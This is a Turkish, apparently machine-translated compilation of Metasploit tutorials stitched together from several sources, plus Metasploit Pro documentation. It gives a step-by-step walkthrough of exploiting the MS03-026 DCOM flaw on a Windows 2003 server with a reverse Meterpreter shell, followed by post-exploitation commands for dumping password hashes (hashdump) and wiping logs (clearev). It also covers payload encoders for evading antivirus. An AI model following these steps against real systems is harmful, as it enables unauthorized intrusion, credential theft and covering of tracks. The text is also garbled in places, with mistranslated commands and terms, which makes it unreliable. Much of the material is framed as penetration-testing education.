internet pencereler Android
Genişletmek

Metasploit işletim düzenlemeleri. Metasploit nedir ve nasıl çalışır? Genel modül ayarları

Orijinal: Metasploit Çerçevesi ile Sızma Testi
Yazarı: Dinesh Shetty
Yayın tarihi: Temmuz 2011
Tercüme: V. Semenenko
Çeviri tarihi: Temmuz 2011

giriiş

Elbette “Sızma Testi aracı” dediğimde bu tabirleri denince aklınıza ilk gelen isim oluyor. Ve şaşılacak bir şey yok! Bu proje Ruby dilinde yazılmış dünyanın en büyük projelerinden biridir. Toplam hat sayısı 700.000'i aşıyor! Günümüzde bu, sızma testi ve güvenlik açıklarını aramak için fiili standarttır. Programın kopyalarının yıllık indirilme sayısı bir milyonu aşıyor. Proje aynı zamanda dünyanın en büyük halka açık doğrulanmış, yüksek kaliteli istismar veritabanına da sahip.

Adları dcerpc modeliyle eşleşen tüm açıkları aramak için msfconsole konsolunda dcerpc ara komutunu yazın. Bunların tümü, bağlantı noktası 135'teki güvenlik açıklarını kullanarak sunucuya erişim sağlamak için kullanılabilir. Bu komutu satıra yazdığımız anda, Şekil3 ekran görüntüsünde gösterildiği gibi msfconsole penceresinde tüm açıkların bir listesini alacağız.

4. Adım:

Artık önümüzde rpc açıklarının bir listesi olduğuna göre, uygulamaya koymadan önce her biri hakkında daha kapsamlı bilgiye ihtiyacımız var. Belirli bir istismarın ayrıntılı bir açıklamasını almak için info istismar/windows/dcerpc/ms03_026_dcom komutunu kullanacağız. Sonunda ne elde edeceğiz? Olası hedeflerin açıklaması; gereksinimlerden yararlanma; bu istismar tarafından kullanılan güvenlik açığının ayrıntılı bir açıklaması; ayrıca daha detaylı bilgi bulabileceğimiz linkler.

Adım 5:

Genel olarak, use komutunu çalıştırmak Belirtilen istismarın ortamını başlatır. Bizim durumumuzda, bu istismarı başlatmak için use istismar/windows/dcerpc/ms03_026_dcom komutunu kullanacağız.

Şekil 4 ekran görüntüsünde görebileceğiniz gibi, istismarı istismar/windows/dcerpc/ms03_026_dcom komutuyla çalıştırdıktan sonra, komut satırı istemi msf > yerine msf istismar(ms03_026_dcom) > olarak değişti. Bu, bu istismarın geçici ortamına taşındığımız anlamına geliyor.

Adım 6:

Şimdi mevcut senaryonun gerektirdiği şekilde istismarın yapılandırma dosyasını düzenlememiz gerekiyor. Show options komutu bize o anda çalışan istismar için gerekli olan çeşitli seçenekleri gösterecektir. Bizim durumumuzda RPORT seçeneği zaten 135'e ayarlıdır. Tek yapmamız gereken set RHOST komutu ile gerçekleştirilen RHOST parametresinin değerini ayarlamak.

Komut satırına RHOST 192.168.42.129 setini giriyoruz ve sonucu görüyoruz - uzak ana bilgisayarın IP adresi, ekran görüntüsündeki gibi 192.168.42.129 olarak ayarlandı.

Adım 7:

İstismarı çalıştırmadan önce yapmamız gereken son şey, bunun payloadını yüklemektir. Mevcut tüm yük seçenekleri show payloads komutu kullanılarak görülebilir.

Ekran görüntüsünde görebileceğiniz gibi, show payloads komutu bize seçtiğimiz istismarla uyumlu tüm payloadları gösterecektir. Bizim durumumuz için, bunu PAYLOAD windows/meterpreter/reserve_tcp komutuyla belirterek yedek bir tcp Meterpreter kullanıyoruz. Başarılı bir şekilde erişilirse uzak sunucuda bir komut kabuğu başlatacaktır. Şimdi tüm gerekli alanların uygun değerlere sahip olduğundan emin olmak için show options komutunu tekrar çalıştırmamız gerekiyor. Yalnızca bu durumda istismar başarıyla çalışacaktır. .

"payload için LHOST seçeneği"nin ayarlı olmadığını unutmayın. Bu nedenle set LHOST 192.168.42.128 komutuyla yerel IP adresini (örneğin 192.168.42.128) ayarlamamız gerekiyor.

Adım 8:

Artık her şey hazır olduğuna ve istismar düzgün şekilde yapılandırıldığına göre, onu çalıştırmanın zamanı geldi.

Kurban makinemizin istismarı çalıştırmaya hazır olduğundan emin olmak için check komutunu kullanabiliriz. Bu seçenek tüm istismarlar için mevcut değildir. Örneğin, ekran görüntüsü bizim durumumuzda durumun tam olarak böyle olduğunu açıkça gösteriyor.

Ancak her durumda kullanmaya değer. Bu, uzaktaki makineye, başlatmak üzere olduğunuz istismarın henüz yamalanmadığından emin olmanızı sağlaması açısından sistem açısından iyi bir yardımcıdır. Başka bir deyişle, istismarı uzaktaki bir makinede tekrar çalıştırmamanız için.

Bizim durumumuzda ekran görüntüsünde görebileceğiniz gibi seçtiğimiz istismarlar kontrol seçeneğini desteklemiyor.

Exploit komutu, yükün uzaktaki makinede yürütülebilmesi için gerekli tüm eylemleri gerçekleştiren seçilen istismarı başlatır.

Ekran görüntüsü, istismarın 192.168.42.129 IP adresine sahip uzak bir makinede, 135 numaralı bağlantı noktasının güvenlik açığını kullanarak başarılı bir şekilde yürütüldüğünü göstermektedir. İstismarın başarılı bir şekilde yürütüldüğü gerçeği, komut satırında son komut isteminin Meterpreter olarak değiştirilmesiyle gösterilir > .

Adım 9:

Artık kurban ile makinemiz arasında ek bir bağlantı kurulduğuna göre sunucunun kontrolünü ele geçirmemiz gerekiyor. Uygun eylemleri gerçekleştirmek için uzak sunucuda çalıştırabileceğimiz tüm mevcut komutların bir listesini almak için yardımı kullanabiliriz.

Aşağıda bazı Meterpreter komutlarının sonuçları verilmiştir:

  • ipconfig - uzak makinede çalışan tüm TCP/IP bağlantılarının yapılandırma verilerini gösterir;
  • getuid - konsolda sunucu adını görüntüler;
  • hashdump - SAM veritabanının bir dökümünü oluşturur;
  • clearev - uzak makinedeki varlığınıza dair orada bırakmış olabileceğiniz tüm izleri siler.

Böylece, üzerinde Windows 2003 Server çalıştıran uzak bir sunucuya erişim sağlamak için çerçeveyi başarıyla kullandık. Kendimize, uzaktaki makine üzerinde tam kontrol ve üzerinde istediğimiz görevleri çalıştırma yeteneği veren, komutları bir kabukta çalıştırma yeteneğini verdik.

Metasploit çerçevesinin potansiyel kullanımları:

  • diğer otomatik güvenlik açığı tespit sistemleriyle birlikte rapor oluşturmak için sızma testinde kullanılabilir. Bu çerçeveyi kullanarak güvenlik açıklarının gerçekten tehlikeli olup olmadığını ve sisteme sızmak için kullanılıp kullanılamayacağını belirleyebilirsiniz.
  • Kelimenin tam anlamıyla her gün ortaya çıkan yeni istismarları test etmek için kullanılabilir. Bu kontrolü, bu amaç için özel olarak tasarlanmış yerel bir sunucuda yapabilirsiniz. Bu çerçeve ile yeni bir istismarın etkili olup olmadığını kolayca kontrol edebilirsiniz.
  • Ayrıca, bir saldırı durumunda IDS'nin doğru şekilde yapılandırıldığını doğrulamak için sızma testi sistemlerinizde harika bir araçtır.

Çözüm

Bu makale çerçevenin kullanımına yüzeysel bir genel bakış niteliğindedir. Bu, güvenlik açıklarına karşı sisteminize genel bir bakışın nasıl gerçekleştirileceğini gösterir. Bu makalede edinilen ilk deneyim bile istismarların nasıl çalıştığını anlamanıza yardımcı olacaktır. Bu, gelecekte kendi maceralarınızı yazmanız için iyi bir yardımcı olabilir. Bu da pentest görevlerini giderek daha yüksek kalitede gerçekleştirmenize yardımcı olacaktır.

Hacking ile ilgili birçok makale yazdık. Metasploit nasıl iz bırakılacağı, bir sitenin iç mimarisinin incelenmesi hakkında bilgilerin yanı sıra komutlar ve komut dosyalarıyla ilgili birçok kısa not da dahil.

Bu kılavuzla, öğrenmeye ve kullanmaya yönelik kapsamlı bir makale dizisine başlıyoruz. Metasploit. Bu, temel bilgileri kısaca ele alacak olan ilk giriş bölümüdür. Metasploit- Dünya gezegenindeki en güçlü bilgisayar korsanlığı platformlarından biri.

Metasploit'in kökeni ve kurulumu

Metasploit Hacker HD Moore tarafından 2003 yılında geliştirilen açık kaynaklı bir projedir. Başlangıçta yazılmıştı perl, ancak 2007'de tamamen yeniden yazıldı. Yakut. 2009 yılında satın alındı Hızlı7 Bilgi güvenliği hizmetleri sağlama konusunda uzmanlaşmış bir şirket olan ve aynı zamanda bir güvenlik açığı tarayıcısı da yayınlayan NEXPOZ.

Metasploit 4.12 sürümü zaten dağıtıma dahil edilmiştir Kali Linux. Aynı zamanda yerleşiktir Geri Takip. Farklı bir dağıtım kullanıyorsanız Linux veya MaxOS, o zaman siteden indirmeniz gerekecek Hızlı7.

Eğer kullanıyorsanız pencereler, o zaman ayrıca indirmeniz gerekecek Metasploit siteden Hızlı7, ancak onu çalıştırmanızı önermiyoruz. pencereler. Bunu kesinlikle yapabilirsiniz, ancak bu makalede ele alacağımız özelliklerin çoğu burada çalışmayacaktır.

sen Metasploit dahil olmak üzere çeşitli versiyonları vardır. Metasploit Pro(tamamen ticari versiyon) ve Topluluk Sürümü(özgür). Sonuncusu yerleşiktir Kali. odaklanacağız Topluluk SürümüÇünkü çoğunuzun 30.000$'lık Pro sürümünü satın almayacağını düşünüyoruz.

Metasploit'i kullanma yolları

Metasploitçeşitli şekillerde kullanılabilir. Her zaman kullandığımız en yaygın yöntem etkileşimli konsoldur. Metasploit. Komut satırına msfconsole girilerek etkinleştirilir Kali. Ayrıca başka yöntemler de vardır.

Msfcli

Neleri kullanabileceğinizle başlayalım Metasploit komut satırından Kali veya modunda msfcli. İlk bakışta konsoldayken komut satırını kullandığımız anlaşılıyor. Gerçekte özel anahtar kelimeler ve komutlar içeren etkileşimli bir konsol kullanıyoruz. Ne zaman çalışıyoruz? msfcli, o zaman aslında Linux komut satırını kullanırız.

Mevcut tüm komutlar hakkında bilgi almak için msfcli, konsola yazın:

Kali > msfcli -h

Şimdi istismarı çalıştırmak için msfcli komutu yazın:

Kali > msfcli yük = ana bilgisayar = lhost = e

"E"nin "Yürüt"ün kısaltması olduğu yer

Oluşturma hakkındaki makalemizde yük(payloads) antivirüs programlarına karşı koruma sağlamak için bu komutu kullanıyoruz msfencode Ve msfpayload komut satırı modunda ( msfcli).

Kullanmanın dezavantajı msfcli o kadar iyi desteklenmiyor msfconsole ve tek bir kabukla sınırlısınız, bu da bazı gelişmiş güvenlik açıklarını imkansız hale getiriyor.

Armitaj

Kullanmak istiyorsanız Metasploit bir grafik kullanıcı arayüzü (GUI) ile, birkaç seçenek vardır. Örneğin Raphael Mudge şunu geliştirdi: Armitaj(Bu, son derece orijinal bilim kurgu siber hackleme kitabı Neuromancer'daki ana karakterin adıdır. Bu türden hoşlanan her hacker'ın mutlaka okuması gereken bir kitaptır. Bilimkurgu).

Başlatmak için Armitaj V Kali, şunu girmeniz yeterli:

Kali > armitaj

Eğer Armitaj bağlanamıyorsanız diğer komutları deneyin:

Kali > hizmet postgresql kali'yi başlat > hizmet metasploit'i başlat kali > hizmet metasploit'i durdur

Armitaj başlı başına bir grafik arayüzdür Metasploit, istemci-sunucu mimarisi üzerine inşa edilmiştir. sen koş Metasploit sunucu olarak ve Armitaj onun istemcisi haline gelir ve işlevlere tam erişim sağlar Metasploit Sezgisel olmasa da tamamen işlevsel bir araç kullanarak, GUI. Eğer gerçekten ihtiyacın varsa GUI kendinizi rahat hissetmek için lütfen kullanın Armitaj. Ancak komut satırında uzmanlaşmak, kendine saygısı olan herhangi bir bilgisayar korsanı için pratikte hayati bir zorunluluktur.

Modüller

sen Metasploit Altı farklı modül vardır:

  1. yükler
  2. istismarlar
  3. postalamak
  4. hayır
  5. ek
  6. kodlayıcılar

Yükler- saldırıya uğramış sistemde bıraktığımız kod budur. Bazıları bunlara dinleyici, rootkit vb. diyor. İÇİNDE Metasploit bunlara yük denir. Yükler komut satırı yardımcı programlarını içerir, Sayaç yorumlayıcısı vesaire. Yük'nin farklı türleri vardır, örneğin, sahnelenmiş, Çizgide, NoNX(bazı modern işlemcilerdeki "Yürütme Yok" özelliğini atlar) PasifX(giden trafiğe ilişkin güvenlik duvarı kurallarını atlar), IPv6 ve diğerleri.

İstismarlar sistemdeki bir güvenlik açığından veya kusurdan yararlanan bir kabuk kodudur. Bu çok özel bir koddur. Örneğin, işletim sistemi, hizmet paketleri (SP'ler), belirli hizmetler, bağlantı noktaları ve hatta uygulamalar için açıklardan yararlanmalar mevcuttur. Ayrıca işletim sistemi türüne göre de sınıflandırılabilirler, dolayısıyla istismar pencerelerçalışmıyor Linux ve tam tersi.

Postalamak- sisteme yönelik istismar sonrası (yani sisteme erişim sağladıktan sonra) saldırılar için kullanabileceğimiz modüllerdir.

hayır- İŞLEM YOK'un kısaltması. X86 ailesi işlemcilerde genellikle onaltılık 0x90 olarak belirtilir. Bu sadece "hiçbir şey yapma" anlamına gelir. Bu, arabellek taşması saldırıları için kritik olabilir. Modüllere bakabiliriz hayır komutu kullanarak göstermek.

Msf>hayırları göster

Ek- diğer kategorilerin hiçbirine uymayan birçok modül (695) içerir. Bunlara füzerler, tarayıcılar, DoS (hizmet reddi) saldırı modülleri ve çok daha fazlası dahildir. Daha detaylı bilgi için sizi şu yazımıza yönlendiririm. Ek modüller.

Kodlayıcılar- bunlar, antivirüs yazılımlarını ve diğer güvenlik sistemlerini atlatmak için yüklerimizi farklı şekillerde kodlamamıza olanak tanıyan modüllerdir. Bu kodlayıcıları şunu yazarak görebiliriz:

Msf > kodlayıcıları göster

Gördüğünüz gibi, Metasploit Yerleşik epeyce kodlayıcı var. Bizim favorilerimizden biri - shikata_ga_nai. Kullanmanıza izin verir yük XOR antivirüs programlarını ve diğer güvenlik sistemlerini aldatmaya yardımcı olur.

Aramak

İÇİNDE Metasploit 4 bir arama seçeneği belirdi. Daha önce kullanmak zorunda kaldım msfcli ve takım grep modülleri bulmak için. Şimdi Hızlı7 anahtar kelime arama ve diğer bazı özellikler eklendi. Aramanın eklenmesi çok zamanında oldu çünkü Metasploitönemli ölçüde büyüdü ve sıradan sorgu aramaları grep 1.400'den fazla istismar arasında herhangi bir şey bulmak artık yeterli değildi.

Anahtar kelime arama, hem basit aramalar hem de daha ayrıntılı arama sorguları gerçekleştirmenize olanak tanır. Örneğin bulmak istediğimiz modülün tipini type anahtar kelimesini kullanarak tanımlayabiliriz:

Msf > arama türü:istismar

Eğer bunu yaparsak o zaman Metasploit bize 1295 istismar döndürecek. Pek kullanışlı değil.

Ama eğer arabaya saldırmak istediğimizi biliyorsak Sun Mikrosistemleri tarafından yönetilen Solaris (Güneş UNIX'i), o zaman aramamızı hassaslaştırabilir ve yalnızca istismarları arayabiliriz. Solaris. Bu durumda anahtar kelimeyi kullanmamız gerekir. platformu.

Msf > arama türü:istismar platformu:solaris

Artık aramamızı, buna karşı çalışacak birkaç istismara kadar daralttık. Solaris.

Aramayı daha da hassaslaştırmak için, saldırmak istediğimizi varsayalım. Solaris RPC'si (sunrpc) ve buna göre yalnızca bu belirli hizmete saldıran istismarları görmemiz gerekiyor. " anahtar kelimesini ekliyoruz sunrpc" aşağıda gösterildiği gibi arama sorgumuza ekleyin:

Msf > arama türü:istismar platformu:solaris sunrpc

Gördüğünüz gibi bu, arama sonuçlarını beş yararlanma modülüne kadar daralttı!

sen Metasploit Gelecekteki makalelerimizde keşfetmeye devam edeceğimiz birçok olasılık var Metasploit. Bazı hileleri deneyin Metasploit'e, sitedeki diğer gönderilerde açıklanmıştır. Geri döndüğünüzden emin olun! Çalışacaksın Metasploit ve bir profesyonel gibi hacklemeyi öğrenin!

Sorumluluğun reddi: Bu makale yalnızca eğitim amaçlı yazılmıştır. Yazar veya yayıncı bu makaleyi kötü amaçlarla yayınlamamıştır. Okuyucuların bilgileri kişisel kazanç amacıyla kullanmak istemeleri durumunda yazar ve yayıncı, doğacak herhangi bir zarar veya zarardan sorumlu değildir.

Yapılacak ilk şey. Henüz Metasploit'i indirmediyseniz, göz atın

Misafirlerden gizlendi

Ve eğer Metasploit bilgisayarınızda zaten kuruluysa, tebrikler! Çalışmaya başlayabilirsiniz.

Metasploit Hakkında

Metasploit, güvenlik açıklarını test etmek, bulmak ve kullanmak için kullanılan bir platformdur. Metasploit çerçevelerini ve bunların ticari benzerlerini içerir: Metasploit Pro, Express, Community ve Nexpose Ultimate.

Metasploit çerçevesi

Metasploit Çerçevesi ticari ürünler yaratmanın temelini oluşturur. Bu bir projedir

Misafirlerden gizlendi

Testlerin ve kapsamlı güvenlik denetimlerinin yürütülmesi için gerekli altyapıyı, içeriği ve araçları sağlar. Açık kaynak topluluğu ve kendi çalışkan içerik ekibi sayesinde düzenli olarak yeni modüller eklenmektedir. Bu, yayınlandıktan hemen sonra kullanımınıza sunulacağı anlamına gelir.

İnternette Metasploit çerçevesini nasıl kullanacağınızı öğrenmenize yardımcı olabilecek pek çok kaynak var. Ancak okumanızı şiddetle tavsiye ederiz.

Misafirlerden gizlendi

Rapid 7 ekibi tarafından desteklenmektedir.

İhtiyacınız olanı bulamıyorsanız bize bildirin; ihtiyacınız olan bilgiyi ekleyelim.

Metasploit Pro ve diğer ticari versiyonlar

Metasploit'in Pro, Express, Community ve Nexpose Ultimate'ı içeren ticari sürümleri, web tabanlı bir penetrasyon testi arayüzü kullanmayı tercih eden kullanıcılar için mevcuttur. Web arayüzüne ek olarak bazı ticari yayınlar Metasploit Framework'te bulunmayan özellikler sunmaktadır.

Ek özelliklerin çoğu, güvenlik açığı testi, sosyal mühendislik ve kaba kuvvet saldırı teknikleri gibi ortak test görevlerini otomatikleştirmeyi ve optimize etmeyi amaçlamaktadır.

Komut satırını kullanıyorsanız ancak yine de ticari özelliklere erişmek istiyorsanız endişelenmeyin. Metasploit Pro, Metasploit Provia komut satırı özelliklerinin çoğuna erişim sağlaması dışında Msf konsoluna çok benzeyen bir konsol içerir.

Metasploit'i Başlatma

Rapid7, Linux ve Windows işletim sistemleri için Metasploit'in ticari ve açık kaynaklı sürümlerini sağlar.

Metasploit Pro'yu yerel bilgisayarınıza veya uzak bir ana bilgisayara kurmak için dosyayı indirip çalıştırabilirsiniz. Metasploit Pro'yu nereye kurarsanız kurun, arayüze bir web tarayıcısı aracılığıyla erişebilirsiniz. Metasploit sunucuya güvenli bir bağlantı kullanır.

Metasploit Pro'yu bir web sunucusuna yüklediyseniz, kullanıcılar arayüze her yerden erişmek için bir web tarayıcısı kullanabilirler. Kullanıcıların sunucu adresini ve bağlantı noktasını bilmesi gerekir. Metasploit hizmeti varsayılan olarak 3790 numaralı bağlantı noktasını kullanır. Kurulum işlemi sırasında Metasploit'in kullandığı bağlantı noktasını değiştirebilirsiniz.

Metasploit yerel makinenizde tekrar çalışıyorsa, Metasploit Pro'ya erişmek için localhost'u ve 3790 numaralı bağlantı noktasını kullanabilirsiniz. Örneğin, girin

Misafirlerden gizlendi

Kullanıcı arayüzünü yüklemek için tarayıcı URL'sinde.

Kurulum hakkında daha fazla bilgi için "Metasploit çerçevesini kurma" veya " bölümüne bakın.

Misafirlerden gizlendi

».

Metasploit Pro Bileşenleri

Metasploit Pro, eksiksiz bir test araçları paketi sağlayan çeşitli bileşenlerden oluşur. Aşağıdaki bileşenler Metasploit Pro'ya dahildir.

Metasploit çerçevesi

Metasploit Framework, çeşitli uygulamalara, işletim sistemlerine ve platformlara erişim sağlayan açık kaynaklı bir test çerçevesidir. Ek özel güvenlik araçları oluşturmak veya yeni güvenlik açıklarına karşı kendi kodunuzu yazmak için Metasploit Çerçevesini kullanabilirsiniz.

Metasploit ekibi düzenli olarak yeni modüller içeren güncellemeler ve Metasploit Pro için düzeltmeler ve iyileştirmeler içeren güncellemeler yayınlar.

Modüller

Modül, Metasploit Çerçevesinin işlevselliğini genişleten tek bir kod veya yazılım parçasıdır. Modüller Metasploit Framework tarafından sağlanan işlevselliği otomatikleştirir.
Modüller vardır: yararlanma, yük, NOP, yararlanma sonrası modül ve diğerleri. Modül türü amacını belirler.

Hizmetler

Metasploit aşağıdaki hizmetleri kullanır:

  • Postgre SQL, Metasploit Pro'nun proje verilerini depolamak için kullandığı veritabanını çalıştırır.
  • Ruby on Rails, Metasploit Pro web arayüzünü çalıştırır.
  • Pro hizmeti veya Metasploit hizmeti Rails'i, Metasploit çerçevesini ve Metasploit RPC sunucusunu kullanır.
Web arayüzü

Metasploit Pro ile çalışmak için bir web arayüzü mevcuttur. Çalıştırmak için tarayıcınızı açın ve şuraya gidin:

Misafirlerden gizlendi

.

Komut satırı arayüzü

Console Pro, Metasploit'i kullanarak komut satırını çalıştırmanıza olanak tanır.

Temel kavramlar ve terimler

Size Metasploit Pro'yu tanıtmak için anlamanız gereken bazı kavram ve terimler şunlardır:

  • Ek modül: Yük taşıma işlemi yapmayan modül. Ek modül örnekleri: tarayıcılar, sunucu saldırılarının reddi vb.
  • Bağlama kabuğu yükü: Kullanılan sisteme bir dinleyici ekleyen ve dinleyiciyle bağlantı kurulmasını bekleyen bir komut satırı.
  • Veri tabanı: Veritabanı, ana bilgisayar verilerini, sistem günlüklerini, toplanan bilgileri ve rapor verilerini saklar.
  • Genişletilmiş tarama: Genişletilmiş tarama, Nmap ve çeşitli Metasploit modüllerini birbirine bağlayan bir Metasploit taramasıdır.
  • Faydalanmak: Belirli bir güvenlik açığından yararlanan ve saldırganın hedef sisteme erişmesine izin veren bir program. Program, kural olarak, yük içerir ve onu hedefe iletir. Örneğin, en yaygın istismarlardan biri, Windows hizmetindeki bir güvenlik açığını hedef alan ve uzaktan kod yürütülmesine izin veren MS08-067'dir.
  • Modülden yararlanma: Hedef sisteme erişim sağlamak amacıyla bir sistem veya uygulamadaki bir güvenlik açığından yararlanmak için bir dizi komut çalıştıran modül. Kısacası, istismar bir oturum oluşturur. Exploit modülleri şunları içerir: arabellek taşması, kod enjeksiyonu ve web uygulaması istismarları.
  • Dinleyici: Dinleyici, istismar edilen herhangi bir hedeften veya saldıran makineden bağlantı sinyali bekler ve bağlantıyı kontrol eder.
  • Sayaç yorumlayıcısı: Etkileşimli bir kabuk sağlayan gelişmiş, çok işlevli bir yük. Meterpreter kabuğundan bir dosya indirebilir, kullanıcı hesapları için şifre karmaları vb. alabilirsiniz. Meterpreter bellek tabanlı olduğundan çoğu izinsiz giriş tespit sistemi bunu görmez.
  • Modül: Metasploit Framework'ün işlevselliğini artıran bağımsız bir kod parçası. Farklı modül türleri vardır: yararlanma, ek veya yararlanma sonrası. Modül türü amacını belirler. Örneğin hedefin kabuğunu açabilen herhangi bir modüle istismar adı verilir. Popüler yararlanma modülü MS08-067.
  • Yük: İstismardan sonra hedef sistemde kullanılan gerçek kod, hedefin güvenliğini başarıyla bozar. Payload, kabuğa nasıl bağlanmak istediğinizi ve onu izlemeye başladıktan sonra hedef sistem hakkında ne yapmak istediğinizi tanımlamanıza olanak tanır. Yük, kabuğun tersi veya onunla ilişkili olabilir. Bu iki tür arasındaki temel fark iletişimin yönüdür.
  • Kullanım sonrası modülü: Daha fazla bilgi toplamanıza veya istismar edilen hedef sisteme daha fazla erişim kazanmanıza olanak tanıyan bir modül. Kullanım sonrası modüllerin örnekleri arasında yazma uygulamaları ve hizmetleri yer alır.
  • Proje: Taramanın parçası olan hedefler, görevler, raporlar ve veriler için kapsayıcı. Proje, taramalar oluşturmak ve görevleri yapılandırmak için kullanılan bir çalışma alanı içerir. Her penetrasyon testi proje içinden çalışır.
  • Yük ters kabuğu: Saldıran makineye bağlanan kabuk.
  • Kabuk (kabuk): Uzak bir hedefe erişim sağlayan bir arayüz.
  • Kabuk kodu: İstismarın veri yükü olarak kullandığı bir dizi talimat.
  • Görev: Metasploit'in gerçekleştirebileceği tarama, yararlanma, raporlama gibi eylemler.
  • Çalışma alanı: Yalnızca Metasploit Framework ile çalışırken kullanılması dışında projeyle aynıdır.
  • Güvenlik Açığı: Saldırganın hedefin güvenliğini aşmasına olanak tanıyan bir güvenlik kusuru. Güvenliği ihlal edilmiş bir sistem, ayrıcalıkların artmasına, verilere yetkisiz erişime, parolaların çalınmasına ve arabellek taşmasına neden olabilir.
Metasploit Pro nasıl çalışır?

Genel penetrasyon testi süreci birkaç aşamaya veya aşamaya ayrılabilir. Kullandığınız metodolojiye bağlı olarak bir penetrasyon testi dört ila yedi aşamayı içerebilir. Aşamaların isimleri farklılık gösterebilmekle birlikte genel olarak problama, tarama, operasyon, operasyon sonrası, erişimin sürdürülmesi, temizlik ve raporlamadan oluşmaktadır.

Metasploit Pro farklı test aşamalarına dayanabilir. İş akışı genel olarak aşağıdaki adımları içerir:

  1. Proje Oluşturun: Hedeflerinizden toplanan verileri depolamak için bir proje oluşturun.
  2. Bilgi Toplama: Metasploit Pro'ya güvenlik açıklarının belirlenmesine yardımcı olabilecek ana bilgisayar verilerini sağlamak için kapsamlı tarama, Nexpose veya araçlar kullanır.
  3. Exploit: Bilinen güvenlik açıklarına karşı saldırılar başlatmak ve güvenliği ihlal edilmiş hedeflere erişim sağlamak için otomatik veya manuel istismarlardan yararlanır.
  4. Kullanım sonrası: Güvenliği ihlal edilen hedefler hakkında daha fazla bilgi toplamak için kullanım sonrası modülleri veya etkileşimli oturumları kullanın. Metasploit Pro, canlı bir makinedeki açık oturumlarla etkileşimde bulunmak için kullanılabilecek çeşitli araçlar sağlar. Örneğin, dahili uygulamalar hakkındaki bilgileri belirlemek ve parola ve karma toplama özelliğinden yararlanmak için güvenliği aşılmış hedeflerdeki paylaşılan dosya sistemlerine bakabilirsiniz.
  5. Kaba kuvvet saldırısı: Geçerli oturum açma bilgilerini bulmak amacıyla toplanan şifreleri kontrol etmek için kaba kuvvet saldırısı gerçekleştirin.
  6. Açık Oturumların Temizlenmesi: Sistemde bulunabilecek verilerle ilgili her türlü bilgiyi kaldırmak için kullanılan hedeflerdeki açık oturumları kapatabilirsiniz. Bu işlem, hedef sistemdeki orijinal ayarları geri yükler.
  7. Rapor Oluşturma: Ayrıntılı bulgular içeren bir rapor oluşturun. Metasploit Pro, rapor verilerinizi özelleştirmek için kullanabileceğiniz çeşitli rapor türleri sağlar. En yaygın kullanılanı, projede yakalanan ana bilgisayarların ve kimlik bilgilerinin ayrıntılı bir değerlendirmesini sağlayan denetim raporudur.
Metasploit Pro'ya web arayüzü üzerinden erişim

Metasploit Pro ile çalışmak üzere web arayüzünü kullanmak için tarayıcınızı açın ve şuraya gidin:

Misafirlerden gizlendi

Metasploit bilgisayarınızda yeniden çalıştırılırsa Localhost'u uzak bilgisayarın adresiyle değiştirmeniz gerekir.
Web arayüzüne giriş yapmak için, Metasploit Pro lisans anahtarını etkinleştirirken oluşturulan hesabın kullanıcı adına ve şifresine ihtiyacınız vardır. Hesabınız için belirlediğiniz şifreyi hatırlamıyorsanız, ona ihtiyacınız var

Misafirlerden gizlendi

.
Desteklenen Tarayıcılar

Kullanıcı arayüzü tüm öğeleri beklendiği gibi görüntülemiyorsa lütfen aşağıda listelenen desteklenen tarayıcılardan birini kullandığınızdan emin olun:

  • GoogleChrome 10+
  • MozillaFirefox 18+
  • İnternet Explorer 10+
  • Buz gelinciği 18+
Metasploit Pro'ya Komut Satırından Erişmek

Pro Console, bir komut satırı arayüzü aracılığıyla Metasploit Pro işlevselliği sağlar ve Metasploit Web Kullanıcı Arayüzü'ne alternatif olarak hizmet eder. Geleneksel olarak Metasploit Çerçevesini kullanıyorsanız, Pro Console size Msf konsoluna benzer bir şey verecektir.

Aşağıdaki görevleri gerçekleştirmek için Pro Console'u kullanabilirsiniz:

  • Projelerin oluşturulması ve yönetimi.
  • Ana bilgisayarları tarama ve listeleme.
  • Verilerin içe ve dışa aktarımı.
  • Modüllerin kurulması ve başlatılması.
  • Otomatik istismarlar başlatılıyor.
  • Ana bilgisayarlar hakkındaki bilgileri görüntüleyin.
  • Kullanılan sistemlerden veri toplanması.

Tüm görevleri Pro konsolu aracılığıyla gerçekleştiremezsiniz. Desteklenmeyen görevler: raporlama, sosyal mühendislik, Meta modüllerini çalıştırma, görev zinciri kurma, kaba kuvvet saldırısı başlatma, web uygulamalarını tarama.​

Windows'ta Pro Console'u Çalıştırma

Konsolu Windows'ta başlatmak için Başlat > Metasploit > Metasploit Konsolu'nu seçin.

Konsolu komut satırından da başlatabilirsiniz. Konsolu komut satırından başlatmak için aşağıdakileri girin:

$cd/metasploit $console.bat

Linux'ta Pro Console'u Çalıştırma

Konsolu Linux'ta başlatmak için şu adımları izleyin:

$ cd /opt/Metasploit/ $ sudo msfpro

Projeler sayfası

Artık Metasploit'in bazı temellerini bildiğinize göre, Metasploit Pro'ya daha yakından bakalım. Metasploit Pro'ya giriş yaptıktan sonra açılan ilk ekran Projeler sayfasıdır. Şu anda Metasploit Pro'da saklanan tüm projeler burada. Ayrıca ürünler ve sihirbazların ve araçların lansmanı hakkındaki haberlere de erişebilirsiniz.

Uygulamanın neresinde olursanız olun, seçebilirsiniz Projeler > Tüm projeleri göster sayfaya gitmek için araç çubuğundan veya Metasploit Pro logosuna tıklayın (aşağıya bakın):

Araç Çubuğu

Ana araç çubuğu web arayüzünün üst kısmında bulunur. Metasploit Pro'nun her yerinden erişilebilir. Proje menüsüne, hesap ayarlarına ve yönetici menüsüne erişmek için araç çubuğunu kullanabilirsiniz.

Hızlı Başlangıç ​​Sihirbazı

Her Hızlı Başlangıç ​​Sihirbazı, bir hedefi taramak ve kullanmak, tasarlanmış sosyal kampanyalar oluşturmak, web uygulamalarını taramak ve kullanmak ve güvenlik açıklarını test etmek gibi bir sızma testi görevinde size rehberlik eden rehberli bir arayüz aracılığıyla çalışır.

Kılavuzlu arayüzü başlatmak için Hızlı Başlatma Sihirbazı simgelerinden herhangi birine tıklayabilirsiniz.

Ürün haberleri

Bu bölüm Rapid 7 ile ilgili en son haberleri içerir. Rapid 7 ve topluluktaki en son modülleri kullanmak istiyorsanız Ürün Haberleri paneli, en son güncellemeler hakkında daha fazla bilgi edinmek için harika bir yerdir.

Herhangi bir nedenle haber panelini görmek istemiyorsanız, projeler sayfasında görünmemesi için onu gizleyebilirsiniz.

Proje Oluşturma

Artık projeler sayfasına aşina olduğunuza göre bir proje oluşturmayı deneyelim.

Proje bir çalışma alanı ve veri depolama alanı içerir. Mantıksal gruplar halinde etkileşim kurmak mümkündür. Kuruluşunuzdaki farklı alt ağlar için sıklıkla farklı gereksinimleriniz olacaktır; bu nedenle, bu gereksinimleri temsil edecek birden fazla projeye sahip olmak harika bir fikirdir.

